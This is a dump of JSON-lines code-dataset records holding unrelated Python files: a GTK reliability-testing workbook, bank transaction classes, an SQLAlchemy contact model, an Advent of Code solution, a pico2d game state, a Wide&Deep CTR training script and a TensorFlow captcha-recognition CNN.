6:\r\n _icon = Configuration.ICON_DIR + '32x32/prat.png'\r\n\r\n # Update the module book view to show the new test.\r\n _icon = gtk.gdk.pixbuf_new_from_file_at_size(_icon, 22, 22)\r\n _data = list(_testing.get_attributes()) + [_icon]\r\n\r\n model.append(parent, _data)\r\n self._modulebook.treeview.expand_all()\r\n\r\n return False\r\n\r\n def _request_delete_testing(self):\r\n \"\"\"\r\n Method to call the BoM data controller function 'delete_testing' and\r\n then update the Testing Work Book 
gtk.TreeView() to remove the deleted\r\n testing item.\r\n\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n # Find the selected testing item.\r\n _selection = self._modulebook.treeview.get_selection()\r\n (_model, _row) = _selection.get_selected()\r\n\r\n # Delete the selected testing item from the database and the\r\n # Testing data controller dictionary.\r\n self._mdcRTK.dtcTesting.delete_testing(self._testing_model.testing_id)\r\n\r\n # Refresh the Testing gtk.TreeView().\r\n if _row is not None:\r\n _path = _model.get_path(_row)\r\n _model.remove(_row)\r\n _selection.select_path(_path)\r\n\r\n return False\r\n\r\n def _on_button_clicked(self, __button, index):\r\n \"\"\"\r\n Method to respond to gtk.Button() 'clicked' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.Button __button: the gtk.Button() that called this method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.Button() that called\r\n this method.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n# WARNING: Refactor _on_button_clicked; current McCabe Complexity metric = 11.\r\n if index == 0:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.add_test(self._testing_model.test_id)\r\n elif index == 1:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.delete_test(self._testing_model.test_id)\r\n elif index == 2:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.save_all_tests()\r\n\r\n return False\r\n\r\n def _on_combo_changed(self, combo, index):\r\n \"\"\"\r\n Method to respond to gtk.ComboBox() 'changed' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.ComboBox combo: the gtk.ComboBox() that called this method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.ComboBox() that\r\n called this method.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n combo.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 3: # Test type\r\n self._testing_model.test_type = combo.get_active()\r\n self._modulebook.update(5, self._testing_model.test_type)\r\n\r\n combo.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n\r\n def _on_focus_out(self, entry, __event, index): # pylint: disable=R0912\r\n \"\"\"\r\n Method to respond to gtk.Entry() 'focus_out' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.Entry entry: the gtk.Entry() that called this method.\r\n :param gtk.gdk.Event __event: the gtk.gdk.Event() that called this\r\n method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.Entry() that\r\n called this method.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n entry.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 0:\r\n _textbuffer = entry.get_buffer()\r\n _description = _textbuffer.get_text(*_textbuffer.get_bounds())\r\n self._testing_model.description = _description\r\n self._modulebook.update(4, self._testing_model.description)\r\n elif index == 1:\r\n self._testing_model.name = entry.get_text()\r\n self._modulebook.update(3, self._testing_model.name)\r\n elif index == 2:\r\n 
self._testing_model.attachment = entry.get_text()\r\n self._modulebook.update(6, self._testing_model.attachment)\r\n\r\n entry.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n\r\n def _on_value_changed(self, button, index): # pylint: disable=R0912\r\n \"\"\"\r\n Method to respond to gtk.SpinButton() 'value_changed' signals and call\r\n the correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.SpinButton button: the gtk.SpinButton() that called this\r\n method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.SpinButton() that\r\n called this method.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n button.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 4:\r\n self._testing_model.confidence = button.get_value() / 100.0\r\n self._modulebook.update(9, self._testing_model.confidence)\r\n elif index == 5:\r\n self._testing_model.consumer_risk = button.get_value()\r\n self._modulebook.update(10, self._testing_model.consumer_risk)\r\n elif index == 6:\r\n self._testing_model.producer_risk = button.get_value()\r\n self._modulebook.update(11, self._testing_model.producer_risk)\r\n\r\n button.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n","sub_path":"rtk-RQA/rtk/testing/WorkBook.py","file_name":"WorkBook.py","file_ext":"py","file_size_in_byte":33157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13371716","text":"from datetime import date\n\n\nclass Transaction:\n    def __init__(self, amount, category, initial_amount):\n        self.amount = amount\n        self.category = category\n        self.initial_amount = initial_amount\n        self.date = date.today()\n\n    @property\n    def description(self):\n        return f'Transaction date: {self.date} \\nTransaction category: {self.category}'\n\n\nclass Deposit(Transaction):\n    def __init__(self, amount, category, tax_rate, initial_amount):\n        Transaction.__init__(self, amount, category, initial_amount)\n        self.tax_rate = tax_rate\n\n    def calculate_tax(self):\n        return self.tax_rate * self.amount * 0.01\n\n    def process(self):\n        return self.initial_amount + self.amount - self.calculate_tax()\n\n\nclass Withdrawal(Transaction):\n    def __init__(self, amount, category, tax_rate, initial_amount):\n        Transaction.__init__(self, amount, category, initial_amount)\n        self.tax_rate = tax_rate\n\n    def calculate_tax(self):\n        return self.tax_rate * self.amount * 0.1\n\n    def process(self):\n        balance = self.initial_amount - self.amount - self.calculate_tax()\n        if balance < 0:\n            print('There is not enough money on your account')\n            return self.initial_amount\n        return balance\n\n\ntransaction = Transaction(20, 'salary', 100)\nprint(transaction.date)\nprint(transaction.category)\nprint(transaction.initial_amount)\nprint(transaction.description)\n\ndeposit = Deposit(33, 'bonus', 15, 100)\nprint(deposit.date)\nprint(deposit.category)\nprint(deposit.description)\nprint(deposit.process())\n\nwithdrawal = Withdrawal(33, 'fee', 5, 100)\nprint(withdrawal.date)\nprint(withdrawal.category)\nprint(withdrawal.description)\nprint(withdrawal.process())\n\nwithdrawal = Withdrawal(1000, 'city_tax', 5, 
100)\nprint(withdrawal.date)\nprint(withdrawal.category)\nprint(withdrawal.description)\nprint(withdrawal.process())\n\n","sub_path":"transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195402938","text":"from models.database import *\r\n\r\nclass BaseContact(db.Base):\r\n __tablename__ = 'contacts'\r\n id = Column(Integer, primary_key=True)\r\n fname = Column(String(255), nullable=False)\r\n lname = Column(String(255), nullable=False)\r\n email = Column(String(255), nullable=False)\r\n subject = Column(String(255), nullable=False)\r\n body = Column(Text(8192), nullable=False)\r\n timestamp = Column(TIMESTAMP, nullable=False)\r\n\r\n def create():\r\n if not db.engine.dialect.has_table(db.engine, 'contacts'):\r\n BaseContact.__table__.create(db.engine)\r\n\r\n\r\n def __repr__(self):\r\n return json.dumps({\r\n 'name': f'{self.fname} {self.lname}',\r\n 'email': self.email,\r\n 'subject': self.subject,\r\n 'body': self.body,\r\n 'timestamp': str(self.timestamp.strftime('%A %d %B %Y at %H:%M'))\r\n })\r\n\r\nclass Contact(BaseContact):\r\n \r\n def all():\r\n return db.session.query(Contact)\r\n\r\n \r\n def get(id):\r\n try:\r\n q = db.session.query(Contact).filter(Contact.id == id)\r\n return json.dumps({\r\n 'status': 'OK',\r\n 'code': 200,\r\n 'contact': repr(q[0])\r\n })\r\n except Exception as error:\r\n print(repr(error))\r\n \r\n return json.dumps({\r\n 'status': 'ERROR',\r\n 'code': 500,\r\n 'message': repr(error)\r\n })\r\n \r\n def add(data):\r\n try:\r\n contact = Contact(fname=data['fname'], lname=data['lname'], email=data['email'], \r\n subject=data['subject'], body=data['body'], timestamp=datetime.now())\r\n db.session.add(contact)\r\n db.session.commit()\r\n\r\n return json.dumps({\r\n 'status': 'OK',\r\n 'code': 200\r\n })\r\n except Exception as error:\r\n print(repr(error))\r\n\r\n db.session.rollback()\r\n\r\n return json.dumps({\r\n 'status': 'ERROR',\r\n 'code': 500,\r\n 'message': repr(error)\r\n })","sub_path":"cgi-bin/models/contact_model.py","file_name":"contact_model.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7911806","text":"from collections import defaultdict\nimport re\n\nfactory = {\n 'bot': defaultdict(lambda: {'has': [], 'low': None, 'high': None}),\n 'output': defaultdict(lambda: {'has': []})\n}\n\ncomps = []\n\n\ndef get_target(target):\n t, i = target\n return factory[t][i]\n\n\ndef give(what, target):\n get_target(target)['has'].append(what)\n t, _ = target\n if t == 'bot' and len(get_target(target)['has']) == 2:\n l, h = tuple(sorted(get_target(target)['has'], key=lambda i: int(i)))\n give(l, get_target(target)['low'])\n give(h, get_target(target)['high'])\n get_target(target)['has'] = []\n comps.append((l, h, target))\n\n\ninput_commands = []\ndef handle_input_line(match):\n what, target = tuple(match.groups())\n target = tuple(target.split())\n input_commands.append((what, target))\n\n\ndef handle_bot_line(match):\n who, type1, target1, type2, target2 = match.groups()\n who = tuple(who.split())\n target1 = tuple(target1.split())\n target2 = tuple(target2.split())\n get_target(who)[type1] = target1\n get_target(who)[type2] = target2\n\n\nline_input_pattern = re.compile(r'value (.+) goes to (.+)')\nline_bot_pattern = re.compile(r'(.+) gives (.+) to (.+) and (.+) to (.+)')\ncommands = [(line_input_pattern, 
handle_input_line), (line_bot_pattern, handle_bot_line)]\n\nwith open('day10.txt') as file:\n for line in file:\n for command in commands:\n pattern, handler = command\n match = pattern.match(line.strip())\n if match is not None:\n handler(match)\n break\n\nfor input_command in input_commands:\n w, t = input_command\n give(w, t)\n\nfor comp in comps:\n l, h, b = comp\n if l == '17' and h == '61':\n print(comp)\n print('part I:', b[1])\n\nn = 1\nfor output in factory['output'].items():\n if output[0] in ['0', '1', '2']:\n print(output)\n n *= int(output[1]['has'][0])\nprint('part II:', n)\n","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100586591","text":"import os\r\nimport random\r\nimport game_framework\r\nimport title_state\r\n\r\nfrom pico2d import *\r\nos.chdir('C:\\\\Temp\\\\lab01')\r\n\r\nrunning = True;\r\n\r\ndef handle_events():\r\n events = get_events()\r\n \r\n for event in events:\r\n if event.type == SDL_QUIT:\r\n game_framework.quit()\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\r\n game_framework.change_state(title_state)\r\n\r\n elif event.type == SDL_QUIT:\r\n running = False\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\r\n running = False\r\n\r\n elif event.type == SDL_MOUSEMOTION:\r\n boy.x, boy.y = event.x, 600 - event.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_1:\r\n team[0].x, team[0].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\r\n team[1].x, team[1].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\r\n team[2].x, team[2].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\r\n team[3].x, team[3].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_5:\r\n team[4].x, team[4].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_6:\r\n team[5].x, team[5].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_7:\r\n team[6].x, team[6].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_8:\r\n team[7].x, team[7].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_9:\r\n team[8].x, team[8].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_0:\r\n team[9].x, team[9].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_F1:\r\n team[10].x, team[10].y = boy.x, boy.y\r\n\r\ndef enter():\r\n open_canvas()\r\n global boy, grass, team\r\n boy = Boy()\r\n boy1 = Boy()\r\n boy2 = Boy()\r\n boy3 = Boy()\r\n boy4 = Boy()\r\n boy5 = Boy()\r\n boy6 = Boy()\r\n boy7 = Boy()\r\n boy8 = Boy()\r\n boy9 = Boy()\r\n boy10 = Boy()\r\n boy11 = Boy()\r\n team = [boy1, boy2, boy3, boy4, boy5, boy6, boy7, boy8, boy9, boy10, boy11]\r\n grass = Grass()\r\n\r\ndef exit():\r\n clear_canvas()\r\n global boy, grass\r\n del(boy)\r\n del(grass)\r\n\r\n\r\nclass Grass:\r\n def __init__(self):\r\n self.image = load_image('grass.png')\r\n\r\n def draw(self):\r\n self.image.draw(400, 30)\r\n\r\nclass Boy:\r\n\r\n image = None\r\n\r\n LEFT_RUN, RIGHT_RUN = 0, 1\r\n\r\n def __init__(self):\r\n self.x, self.y = random.randint(100, 700), random.randint(90, 500)\r\n self.frame = random.randint(0, 7)\r\n self.dir = 1\r\n self.state = self.RIGHT_RUN\r\n\r\n if Boy.image == None:\r\n Boy.image = load_image('animation_sheet.png')\r\n\r\n def 
update(self):\r\n if self.state == self.RIGHT_RUN:\r\n self.frame = (self.frame+1)%8\r\n self.x += (self.dir * 5)\r\n\r\n if self.x > 800:\r\n self.dir = -1\r\n self.x = 800\r\n self.state = self.LEFT_RUN\r\n\r\n if self.state == self.LEFT_RUN:\r\n self.frame = (self.frame + 1)%8\r\n self.x += (self.dir * 5)\r\n\r\n if self.x < 0:\r\n self.dir = 1\r\n self.x = 0\r\n self.state = self.RIGHT_RUN\r\n\r\n\r\n def draw(self):\r\n self.image.clip_draw(self.frame*100, self.state * 100, 100, 100, self.x, self.y)\r\n\r\n\r\ndef update():\r\n for boy in team:\r\n boy.update()\r\n\r\ndef draw():\r\n clear_canvas()\r\n grass.draw()\r\n for boy in team:\r\n boy.draw()\r\n update_canvas()\r\n delay(0.05)\r\n\r\ndef main():\r\n enter()\r\n\r\n while running:\r\n handle_events()\r\n update()\r\n draw()\r\n\r\n exit()\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"10.11 과제/main_state.py","file_name":"main_state.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623617327","text":"import pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom ctr_model.models import WDL\nfrom ctr_model.inputs import SparseFeat, DenseFeat, get_feature_names\n\nimport torch\n\nif __name__ == \"__main__\":\n    data = pd.read_csv('dataset/criteo_sampled_data.csv')\n\n    sparse_features = ['C'+ str(i) for i in range(1, 27)]\n    dense_features = ['I'+ str(i) for i in range(1, 14)]\n\n    # Fill in missing values\n    data[sparse_features] = data[sparse_features].fillna('-1', )\n    data[dense_features] = data[dense_features].fillna(0, )\n    target = ['label']\n\n    # sparse -> label dense -> 0~1\n    for feat in sparse_features:\n        lbe = LabelEncoder()\n        data[feat] = lbe.fit_transform(data[feat])\n\n    mms = MinMaxScaler(feature_range=(0, 1))\n    data[dense_features] = mms.fit_transform(data[dense_features])\n\n    # count #unique features for each sparse field, and record dense feature field name\n    feature_columns = [SparseFeat(feat, data[feat].unique()) for feat in sparse_features] + \\\n                      [DenseFeat(feat,1,) for feat in dense_features]\n\n    dnn_feature_columns = feature_columns\n    linear_feature_columns = feature_columns\n\n    feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n    # generate train and eval data for model\n    train, test = train_test_split(data, test_size=0.2)\n    train_model_input = [train[name] for name in feature_names]\n    test_model_input = [test[name] for name in feature_names]\n\n    # define model, train, eval, predict\n    device = \"cpu\"\n    use_cuda = True\n    if use_cuda and torch.cuda.is_available():\n        print(\"cuda ready\")\n        device = 'cuda:0'\n\n    model = WDL(linear_feature_columns, dnn_feature_columns,task='binary',\n                l2_reg_embedding=1e-5,l2_reg_linear=1e-5,l2_reg_dnn=0,device=device)\n\n    model.compile(\"adagrad\", \"binary_crossentropy\", metrics=[\"binary_crossentropy\", \"auc\"], )\n    model.fit(train_model_input, train[target].values, batch_size=256, epochs=10, validation_split=0.2, verbose=2)\n\n    pred_ans = model.predict(test_model_input, 256)\n\n    print(\"test logloss\", round(log_loss(test[target].values, pred_ans), 4))\n    print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 
4))","sub_path":"test/wdl_test.py","file_name":"wdl_test.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243653825","text":"import tensorflow as tf\n\n# captcha infos\nnumber = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f']\n\nchar_set = number + alphabet\nCHAR_SET_LEN = len(char_set)\n\ntf.logging.set_verbosity(tf.logging.INFO)\nflags = tf.app.flags\nflags.DEFINE_integer('num_epochs', 20, 'Number of traning epochs')\nflags.DEFINE_integer('batch_size', 64, 'Batch size')\nflags.DEFINE_float('learning_rate', 0.001, 'Learning rate')\nflags.DEFINE_float('dropout_rate', 0.75, 'Dropout rate')\nflags.DEFINE_string('train_dataset', 'captcha_train.tfrecords', 'Filename of train dataset')\nflags.DEFINE_string('valid_dataset', 'captcha_valid.tfrecords', 'Filename of valid dataset')\nflags.DEFINE_string('model_dir', 'trained_model/lenet_captcha', 'Filename of model ')\n\nflags.DEFINE_integer('CHAR_SET_LEN', CHAR_SET_LEN, 'Range of the words in captcha')\nflags.DEFINE_integer('MAX_CAPTCHA', 4, 'Lengh of the captcha')\nflags.DEFINE_integer('IMAGE_HEIGHT', 34, 'Height of the captcha image')\nflags.DEFINE_integer('IMAGE_WIDTH', 66, 'Width of the captcha image')\nflags.DEFINE_integer('IMAGE_CHANNELS', 1, 'Channels of the captcha image')\nFLAGS = flags.FLAGS\n\n\n# 定义模型函数\n# 该函数需要返回一个定义好的tf.estimator.EstimatorSpec对象,对于不同的mode,提供的参数不一样\n# 训练模式,即 mode == tf.estimator.ModeKeys.TRAIN,必须提供的是 loss 和 train_op。\n# 验证模式,即 mode == tf.estimator.ModeKeys.EVAL,必须提供的是 loss。\n# 预测模式,即 mode == tf.estimator.ModeKeys.PREDICT,必须提供的是 predicitions。\ndef lenet_model_fn(features, labels, mode):\n # 输入层\n x = tf.reshape(features, shape=[-1, FLAGS.IMAGE_HEIGHT, FLAGS.IMAGE_WIDTH, FLAGS.IMAGE_CHANNELS], name=\"x_input\")\n\n # 卷积层1\n x = tf.layers.conv2d(inputs=x, filters=32, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv1')\n # 池化层1\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool1')\n # drop out1\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout1')\n\n # 卷积层2\n x = tf.layers.conv2d(inputs=x, filters=64, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv2')\n # 池化层2\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool2')\n # drop out2\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout2')\n\n # 卷积层3\n x = tf.layers.conv2d(inputs=x, filters=128, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv3')\n # 池化层3\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool3')\n # drop out3\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout3')\n\n # 全连接层1\n x = tf.reshape(x, [-1, 5 * 9 * 128])\n x = tf.layers.dense(inputs=x, units=1024, activation=tf.nn.relu, name='dense')\n\n # drop out3\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout4')\n\n logits = tf.layers.dense(inputs=x, units=FLAGS.MAX_CAPTCHA * FLAGS.CHAR_SET_LEN, name='final')\n\n # 预测\n predictions = {\n 'x_predict': tf.reshape(logits, [-1, FLAGS.MAX_CAPTCHA, FLAGS.CHAR_SET_LEN], name=\"x_predict\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # 计算loss(对于train和valid模式)\n loss1 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 0:16], 
labels=labels[:, 0:16]))\n loss2 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 16:32], labels=labels[:, 16:32]))\n loss3 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 32:48], labels=labels[:, 32:48]))\n loss4 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 48:], labels=labels[:, 48:]))\n loss = (loss1 + loss2 + loss3 + loss4) / 4.0\n\n # 评估方法\n max_idx_p = tf.argmax(predictions['x_predict'], 2)\n max_idx_l = tf.argmax(tf.reshape(labels, [-1, FLAGS.MAX_CAPTCHA, FLAGS.CHAR_SET_LEN]), 2)\n\n correct_pred = tf.equal(max_idx_p, max_idx_l)\n batch_acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # 为了打印训练中的结果\n accuracy, update_op = tf.metrics.accuracy(\n labels=max_idx_p, predictions=max_idx_l, name='accuracy'\n )\n\n tf.summary.scalar('batch_acc', batch_acc)\n tf.summary.scalar('streaming_acc', update_op)\n\n # 训练配置(对于train模式)\n if mode == tf.estimator.ModeKeys.TRAIN:\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n eval_metric_ops = {\n 'accuracy': (accuracy, update_op)\n }\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n# 用于解析tfrecords数据\ndef _parse_function(proto):\n features = {'label0': tf.FixedLenFeature([], tf.int64),\n 'label1': tf.FixedLenFeature([], tf.int64),\n 'label2': tf.FixedLenFeature([], tf.int64),\n 'label3': tf.FixedLenFeature([], tf.int64),\n 'image_encoded': tf.FixedLenFeature([], tf.string, default_value='')}\n\n parsed_feature = tf.parse_single_example(proto, features)\n image = tf.image.decode_image(parsed_feature['image_encoded'], channels=FLAGS.IMAGE_CHANNELS)\n image = tf.reshape(image, [FLAGS.IMAGE_HEIGHT, FLAGS.IMAGE_WIDTH, FLAGS.IMAGE_CHANNELS])\n image = tf.cast(image, dtype=tf.float32) # 像素值需转换为float,后面送入卷积层参与计算\n image = tf.divide(tf.subtract(image, 128.0), 128.0) # 图片标准化\n\n image_label0 = tf.cast(parsed_feature['label0'], tf.int32) # 首先转为整型,再进行one hot编码\n image_label1 = tf.cast(parsed_feature['label1'], tf.int32)\n image_label2 = tf.cast(parsed_feature['label2'], tf.int32)\n image_label3 = tf.cast(parsed_feature['label3'], tf.int32)\n\n image_label0 = tf.one_hot(image_label0, depth=FLAGS.CHAR_SET_LEN, axis=0) # axis=0和1是一样的效果\n image_label1 = tf.one_hot(image_label1, depth=FLAGS.CHAR_SET_LEN, axis=0)\n image_label2 = tf.one_hot(image_label2, depth=FLAGS.CHAR_SET_LEN, axis=0)\n image_label3 = tf.one_hot(image_label3, depth=FLAGS.CHAR_SET_LEN, axis=0)\n\n image_label = tf.concat([image_label0, image_label1, image_label2, image_label3], axis=0)\n\n return image, image_label\n\n\ndef main(unused_argv):\n # 读取训练数据集\n def train_input_fn():\n '''\n 训练输入函数,返回一个batch的features和labels\n :return:\n '''\n train_dataset = tf.data.TFRecordDataset(FLAGS.train_dataset)\n train_dataset = train_dataset.map(_parse_function, num_parallel_calls=8)\n train_dataset = train_dataset.repeat(FLAGS.num_epochs)\n train_dataset = train_dataset.batch(FLAGS.batch_size)\n train_iterator = train_dataset.make_one_shot_iterator()\n features, labels = train_iterator.get_next()\n\n return features, labels\n\n # 读取验证数据集\n def valid_input_fn():\n '''\n 验证输入函数,返回一个batch的features和labels\n :return:\n '''\n valid_dataset = tf.data.TFRecordDataset(FLAGS.valid_dataset)\n 
valid_dataset = valid_dataset.map(_parse_function, num_parallel_calls=8)\n # valid_dataset = valid_dataset.repeat(FLAGS.num_epochs)\n valid_dataset = valid_dataset.batch(FLAGS.batch_size)\n valid_dataset = valid_dataset.make_one_shot_iterator()\n features, labels = valid_dataset.get_next()\n\n return features, labels\n\n # run模型\n classifier_ = tf.estimator.Estimator(\n model_fn=lenet_model_fn, model_dir=FLAGS.model_dir\n )\n\n classifier_.train(input_fn=train_input_fn)\n valid_results = classifier_.evaluate(input_fn=valid_input_fn)\n print(valid_results)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"cnn_tensorflow/train_estimator.py","file_name":"train_estimator.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529153646","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nfrom ..third_party.qtpy.QtCore import *\nfrom ..third_party.qtpy.QtWidgets import *\nfrom ..third_party.qtpy.QtGui import *\n\nfrom .qt.mainwindow import Ui_MainWindow\nfrom .widgets.sub_windows import PlotSubWindow\nfrom .widgets.dialogs import LayerArithmeticDialog\nfrom .widgets.menus import LayerContextMenu\nfrom ..core.comms import Dispatch, DispatchHandle\nfrom ..core.annotation import LineIDMarker\n\n\nclass Viewer(QMainWindow):\n \"\"\"\n The `Viewer` is the main construction area for all GUI widgets. This\n object does **not** control the interactions between the widgets,\n but only their creation and placement.\n \"\"\"\n def __init__(self, parent=None):\n super(Viewer, self).__init__(parent)\n self._current_sub_window = None\n\n self.main_window = Ui_MainWindow()\n self.main_window.setupUi(self)\n self.wgt_data_list = self.main_window.listWidget\n self.wgt_layer_list = self.main_window.treeWidget_2\n self.wgt_model_list = self.main_window.treeWidget\n self.wgt_model_list.setHeaderLabels([\"Parameter\", \"Value\"])\n\n # Setup\n self._setup_connections()\n\n # Context menus\n self.wgt_layer_list.setContextMenuPolicy(Qt.CustomContextMenu)\n self.layer_context_menu = LayerContextMenu()\n\n self.wgt_model_list.setContextMenuPolicy(Qt.CustomContextMenu)\n\n # Define the layer arithmetic dialog\n self._layer_arithmetic_dialog = LayerArithmeticDialog()\n\n # Setup event handler\n DispatchHandle.setup(self)\n\n def _setup_connections(self):\n # Listen for subwindow selection events, update layer list on selection\n self.main_window.mdiArea.subWindowActivated.connect(\n self._set_current_sub_window)\n\n # When a user edits the model parameter field, validate the input\n self.wgt_model_list.itemChanged.connect(\n self._model_parameter_validation)\n\n @DispatchHandle.register_listener(\"on_selected_layer\")\n def _set_model_tool_options(self, layer_item):\n if layer_item is None:\n self.main_window.createModelLayerButton.hide()\n self.main_window.updateModelLayerButton.hide()\n self.main_window.fittingRoutinesGroupBox.setEnabled(False)\n self.main_window.loadModelButton.setEnabled(False)\n self.main_window.saveModelButton.setEnabled(False)\n self.main_window.exportModelButton.setEnabled(False)\n\n return\n\n layer = layer_item.data(0, Qt.UserRole)\n\n if not hasattr(layer, 'model'):\n self.main_window.createModelLayerButton.show()\n self.main_window.updateModelLayerButton.hide()\n self.main_window.fittingRoutinesGroupBox.setEnabled(False)\n self.main_window.saveModelButton.setEnabled(False)\n self.main_window.exportModelButton.setEnabled(False)\n 
self.main_window.loadModelButton.setEnabled(True)\n else:\n self.main_window.createModelLayerButton.hide()\n self.main_window.updateModelLayerButton.show()\n self.main_window.fittingRoutinesGroupBox.setEnabled(True)\n self.main_window.saveModelButton.setEnabled(True)\n self.main_window.exportModelButton.setEnabled(True)\n self.main_window.loadModelButton.setEnabled(False)\n\n def _set_current_sub_window(self, sub_window):\n sub_window = sub_window or self.main_window.mdiArea.currentSubWindow()\n\n if sub_window is None:\n sub_window = self.main_window.mdiArea.activatePreviousSubWindow()\n\n if self._current_sub_window != sub_window:\n self._current_sub_window = sub_window\n Dispatch.on_selected_window.emit(window=self._current_sub_window)\n\n @property\n def current_data(self):\n \"\"\"\n Returns the currently selected data object from the data list widget.\n\n Returns\n -------\n data : specviz.core.data.Data\n The `Data` object of the currently selected row.\n \"\"\"\n data_item = self.wgt_data_list.currentItem()\n\n if data_item is not None:\n data = data_item.data(Qt.UserRole)\n return data\n\n @property\n def current_layer(self):\n \"\"\"\n Returns the currently selected layer object form the layer list widget.\n\n Returns\n -------\n layer : specviz.core.data.Layer\n The `Layer` object of the currently selected row.\n \"\"\"\n layer_item = self.wgt_layer_list.currentItem()\n\n if layer_item is not None:\n layer = layer_item.data(0, Qt.UserRole)\n\n return layer\n\n @property\n def current_layer_item(self):\n return self.wgt_layer_list.currentItem()\n\n @property\n def current_model_item(self):\n return self.wgt_model_list.currentItem()\n\n @property\n def 